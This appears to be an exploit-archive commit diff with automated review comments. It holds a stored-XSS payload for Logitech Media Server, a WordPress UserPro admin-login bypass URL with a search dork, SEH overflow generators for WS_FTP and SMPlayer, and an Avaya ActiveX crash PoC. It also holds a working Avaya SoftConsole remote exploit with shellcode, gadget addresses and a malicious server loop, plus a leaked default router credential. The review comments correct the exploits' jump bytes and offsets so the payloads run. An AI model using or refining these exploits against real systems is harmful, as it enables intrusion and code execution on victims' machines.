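Review bot: the evidence shown is a login with `admin` / `CenturyL1nk`, which reads as a default credential for a documented account, whereas the title and the files.csv row call it a "Backdoor Account"; say whether this password is the ISP-provisioned default that the owner can change or a fixed value that survives a password change, because the remediation differs (change it versus nothing the user can do). The `/etc/passwd` dump is the stronger finding and deserves a sentence: all four accounts (`admin`, `support`, `user`, `nobody`) have UID 0 and a `/bin/sh` login shell, so any of the other three credentials yields the same root shell, and the `nobody` line is missing its home-directory field. Minor: the prior submission referenced is 43105 by "Matthew Sheimo" per files.csv, spelled "Shiemo" here.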

@ -0,0 +1,19 @@
# Exploit Title: Logitech Media Server : Persistent Cross Site Scripting(XSS)
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Software Link: [download link if available]
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
POC:
Access and go to the favorites tab and add a new favorite.
Add script as the value of the field.
Payload : <script> alert(1)</script>
Script saved and gives a pop-up to user every time they access that page.
Therefore, Persistent XSS.
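Review bot: the `# Software Link: [download link if available]` line is the unfilled template placeholder and should be filled in or removed. The PoC also never says where the injected value is rendered (the favorites page itself, the player UI, or both) or whether adding a favorite requires authentication; since the alert fires "every time they access that page", name the vulnerable field and the response that echoes it unencoded so a fix can be verified. The file title ("Persistent Cross Site Scripting") and the files.csv description ("'favorites' Cross-Site Scripting") should use the same parameter name.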

@ -0,0 +1,18 @@
# Exploit Title: Logitech Media Server : HTML code injection and execution.
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
 
 
 
POC:
 
1. Access and go to the Radio URL tab and add a new URL.
2. Add script as the value of the field.
3. Payload : <script> alert(1)</script>
4. Script saved and gives an image msg with a javascript execution on image click.
5. Therefore, Persistent XSS.
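Review bot: the header calls this "HTML code injection and execution" and step 5 calls it "Persistent XSS", but step 4 says the script only runs "on image click", which means the payload is landing in a context (likely an attribute of an image element) that needs user interaction rather than executing on page load; name the sink and show the rendered HTML so severity can be judged, and align the title with the files.csv entry ("'Radio URL' Cross-Site Scripting"). The whitespace-only lines between the header block and "POC:" should be removed.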

platforms/php/webapps/43117.txt Executable file
@ -0,0 +1,30 @@
# Exploit Title: Userpro WordPress Plugin Authentication Bypass
# Google Dork: inurl:/plugins/userpro
# Date: 11.04.2017
# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Version: <= 4.6.17
# Tested on: Wordpress 4.8.3
# CVE : requested, not assigned yet.
Description
================================================================================
The userpro plugin has the ability to bypass login authentication for the user
'admin'. If the site does not use the standard username 'admin' it is not affected.
PoC
================================================================================
1 - Google Dork inurl:/plugins/userpro
2 - Browse to a site that has the userpro plugin installed.
3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true
4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in
will full administrator access.
================================================================================
10/25/2017 Wordfence notified of issue by Iain Hadgraft.
10/26/2017 Vendor resolved the issue in the plugin.
11/04/2017 - Disclosure.
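Review bot: the PoC shows the trigger (`?up_auto_log=true`) but nothing about why it works or which release fixed it; `# Version: <= 4.6.17` here conflicts with the files.csv row for 43117 in this same commit (`< 4.9.17.1`), and the timeline only says "Vendor resolved the issue" with no version, so readers cannot tell whether they are patched. State the fixed version and, as far as known, the root cause (per the Description, a parameter that logs the requester in as the `admin` username without checking credentials). Typos: "will full administrator access" should read "with full", and "Wordpress" is "WordPress".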

platforms/windows/dos/43115.py Executable file
@ -0,0 +1,21 @@
#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)
#Author: Kevin McGuigan. Twitter: @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#Date: 03/11/2017
#Version: 12.6.03
#CVE: CVE-2017-16513
#Tested on: Windows 7 32-bit
#Use script to generate payload. Paste payload into search field, replace Ds with shellcode.
#nSEH = "\x74\x08\x90\x90"
#SEH = "\x31\x2D\x91\x23"
buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4
f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()
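Review bot: the commented-out `nSEH`/`SEH` values are the whole exploit and the comment needs two corrections before anyone pastes them in. `\x74\x08` is `JE rel8` (opcode 0x74), not an unconditional `JMP rel8` (0xEB), so it depends on ZF being set when the handler returns; the usual choice is `\xEB\x06` or a `\x74\x06\x75\x04` JE/JNE pair. And as written the jump lands 2 bytes past the SEH record (the instruction ends at offset 2 of nSEH, +8 gives offset 10, while nSEH+SEH occupy offsets 0-7 and the `D` block starts at 8), so the shellcode needs a 2-byte NOP pad or the displacement should be `\x06`. Also record which module the handler address 0x23912D31 (`\x31\x2D\x91\x23`, presumably a POP POP RET) lives in and that it is non-SafeSEH and non-ASLR, since that address is what ties the PoC to 12.6.03 on 32-bit Windows 7, and reconcile the `Version:` header (12.6.03) with the files.csv row (`< 12.6.0.3`).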

platforms/windows/dos/43120.txt Executable file
@ -0,0 +1,156 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: ApparitionSec
Vendor:
=============
www.avaya.com
Product:
===========
Avaya IP Office (IPO)
v9.1.0 - 10.1
IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions.
For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.
Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2).
In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application).
Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud.
Vulnerability Type:
====================
ActiveX Remote Buffer Overflow
CVE Reference:
==============
CVE-2017-12969
ASA-2017-313
Security Issue:
================
ViewerCtrl.ocx ActiveX Component used by Avaya IP Office (IPO) can be exploited by remote attackers to potentially execute arbitrary
attacker supplied code. User would have to visit a malicious webpage using InternetExplorer where the exploit could be triggered.
Clsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334}
Safe for Script: False
Safe for Init: False
ACCESS_VIOLATION
8C4A77 MOV EAX,[ECX]
SEH Chain:
-----------
1 8D00A3 po.dll
2 36A7E95 CIPElements.dll
3 36A8115 CIPElements.dll
4 788719 ViewerCtrl.OCX
5 788533 ViewerCtrl.OCX
6 78862A ViewerCtrl.OCX
7 6008793E mfc90u.dll
8 60089B31 mfc90u.dll
9 779858C5 ntdll.dll
(d360.1040c): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for po.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CIPElements.dll -
eax=0608ec18 ebx=00000000 ecx=00000000 edx=00000000 esi=0aa7bdd0 edi=0aa7bdd0
eip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
po!cip::po::SpecialObjects::getPresetObject+0x77:
06064a77 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=????????
0:008> !load winext/msec
0:008> !exploitable
!exploitable 1.6.0.0
*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ieframe.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for iertutil.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for IEShims.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at
po!cip::po::SpecialObjects::getPresetObject+0x0000000000000077 (Hash=0x6f1f914b.0xc46b7285)
The data from the faulting address is later used as the target for a branch.
References:
==============
https://downloads.avaya.com/css/P8/documents/101044091
Exploit/POC:
=============
<object classid='clsid:27F12EFD-325D-4907-A2D2-C38A2B6D3334' id='victim' />
<script language='vbscript'>
victimFile = "C:\Program Files (x86)\Avaya\IP Office Contact Center\User Interface\ViewerCtrl.ocx"
prototype = "Function open ( ByVal containerId As String ) As Long"
memberName = "open"
progid = "ViewerCtrlLib.ViewerCtrl"
argCount = 1
payload=String(5142, "A")
victim.open payload
</script>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: July 12, 2017
Vendor acknowlegement: July 14, 2017
CVE assigned by mitre : August 19, 2017
Vendor advisory : November 4, 2017
November 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
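Review bot: the title classifies this as an ActiveX buffer overflow, but the crash record in this advisory shows a NULL-pointer read rather than a corrupted buffer: ecx=00000000 at po!cip::po::SpecialObjects::getPresetObject+0x77 (mov eax,dword ptr [ecx]), and every entry in the SEH chain listed above it still points into a loaded module (po.dll, CIPElements.dll, ViewerCtrl.OCX, mfc90u.dll, ntdll.dll). The PROBABLY_EXPLOITABLE verdict rests only on "data from the faulting address is later used as the target for a branch", so the write-up should either show where the 5142-byte argument to open overwrites memory or describe the finding as a NULL dereference / denial of service. Two smaller points: the control is listed as Safe for Script: False and Safe for Init: False, so the PoC page only runs in Internet Explorer under non-default ActiveX settings, and the advisory should state the configuration in which the crash was reproduced; and `<object ... />` is not a self-closing element, so the tag should be closed with `</object>`. In the timeline, "acknowlegement" should read "acknowledgement".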

platforms/windows/dos/43124.py Executable file

@ -0,0 +1,27 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: SMPlayer 17.11.0 - '.m3u' Crash (PoC)
# Date: 05-11-2017
# Vulnerable Software: SMPlayer v17.11.0
# Vendor Homepage: http://www.smplayer.info
# Version: v17.11.0
# Software Link: http://www.smplayer.info/en/downloads
# Tested On: Windows 7 x64
#
#
# PoC: generate crash.m3u, open playlist twice in app
#
#
file="crash.m3u"
crash = "A"*24538 #crashes on 24538, but more will do
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()
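Review bot: the header title ("'.m3u' Crash (PoC)") disagrees with the database entry name ("'.m3u' Buffer Overflow (PoC)"), and nothing in the file supports the overflow classification: there is no faulting module, register state or SEH detail, only "crashes on 24538, but more will do". Either add the crash context that justifies "Buffer Overflow" or keep the title at "Crash (PoC)". The reproduction note "open playlist twice in app" also needs a sentence on why a second open is required, since that points at state retained from the first load. Minor: `file` shadows a Python 2 built-in (rename it, e.g. `filename`), and the date "05-11-2017" is ambiguous between day-first and month-first.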


@ -0,0 +1,172 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: apparitionSec
Vendor:
=============
www.avaya.com
Product:
===========
Avaya IP Office (IPO)
v9.1.0 - 10.1
IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions.
For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.
Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2).
In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application).
Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud.
Vulnerability Type:
===================
Remote Buffer Overflow
CVE Reference:
==============
CVE-2017-11309
ASA-2017-307
Security Issue:
================
SoftConsole.exe does not check bounds when reading server response on making an outbound connection, resulting in a classic
Buffer Overflow exploit.
Avaya IP Office user must connect to a malicious server where a remote attacker can then deliver the buffer overflow
payload in the server response, exploiting the SoftConsole client. This vulnerability allows attackers to deliver and
execute arbitrary attacker supplied code on the Avaya host system.
References:
===========
https://downloads.avaya.com/css/P8/documents/101044086
POC Video URL:
==============
https://vimeo.com/224679849
Exploit/POC:
=============
import struct,socket
#Log data, item 8
# Address=50E083A1
# Message= 0x50e083a1 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READ} [IndyCore190.bpl]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604
#(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl)
#50E083A1 #POP ECX POP EBP RET
'''
No SafeSEH
'''
HOST="127.0.0.1"
PORT=80
#shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7)
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08"
"\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x8B\x7B"
"\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99\x32\x17\x66\xC1"
"\xCA\x01\xAE\x75\xF7\x66\x81\xFA\x10\xF5\xE0\xE2\x75\xCF\x8B\x53"
"\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68"
"\x2E\x65\x78\x65\x68\x77\x75\x73\x61\x54\x87\x04\x24\x50\xFF\xD5"
"\xCC")
'''
calculated by taking the negative of the number and convert to hex:
in gdb
1
2
p/x -1116
$4 = 0xfffffba4
So now we know that our near jump is going to be \xe9\xa4\xfb\xff\xff.
'''
seh=struct.pack("<L", 0x50E149FD) #POP ECX POP EBP RET
#payload="A"*564+"BBBBRRRR"+"A"*232 #control SEH here
#(gdb) p/x -112
#$1 = 0xffffff90
negjmp="\xeb\x90\xff\xff"
payload="A"*452+"\x90"*10+sc+"A"*5+negjmp+seh+"\x90"*226
s = socket.socket()
host = ''
s.bind((HOST, PORT))
s.listen(5)
print 'Avaya IP Office SoftConsole 9.1.0'
print '0day Remote Buffer Overflow Exploit'
print 'Discovery / exploit: hyp3rlinx\n'
print 'Listening on port 80 for Avaya client connectionz...'
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
print 'KABOOM!!!'
conn.close()
s.close()
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: July 7, 2017
Vendor reply "under investigation" : July 7, 2017
Vendor acknowledgement of issue : July 12, 2017
CVE assigned by mitre: July 13, 2017
Vendor advisory: November 4, 2017
November 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
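Review bot: the comments and the code disagree about the SEH gadget: the block at the top documents 0x50E083A1 ("pop ecx # pop ebp # ret 0x04" in IndyCore190.bpl) and repeats "#50E083A1 #POP ECX POP EBP RET", but `seh=struct.pack("<L", 0x50E149FD)` packs a different address under the same description. One of the two is stale; the comment should name the address actually used and its module. The same applies to the jump: the docstring derives a five-byte near jump (p/x -1116 -> \xe9\xa4\xfb\xff\xff), while `negjmp="\xeb\x90\xff\xff"` is a two-byte short jump (EB 90, i.e. -112, matching the "p/x -112" comment) followed by two filler bytes, so the -1116 derivation should be removed or marked as superseded. Minor: `host = ''` is assigned and never used, and the print statements are Python 2 only, which should be stated in the header so the script is not run under Python 3.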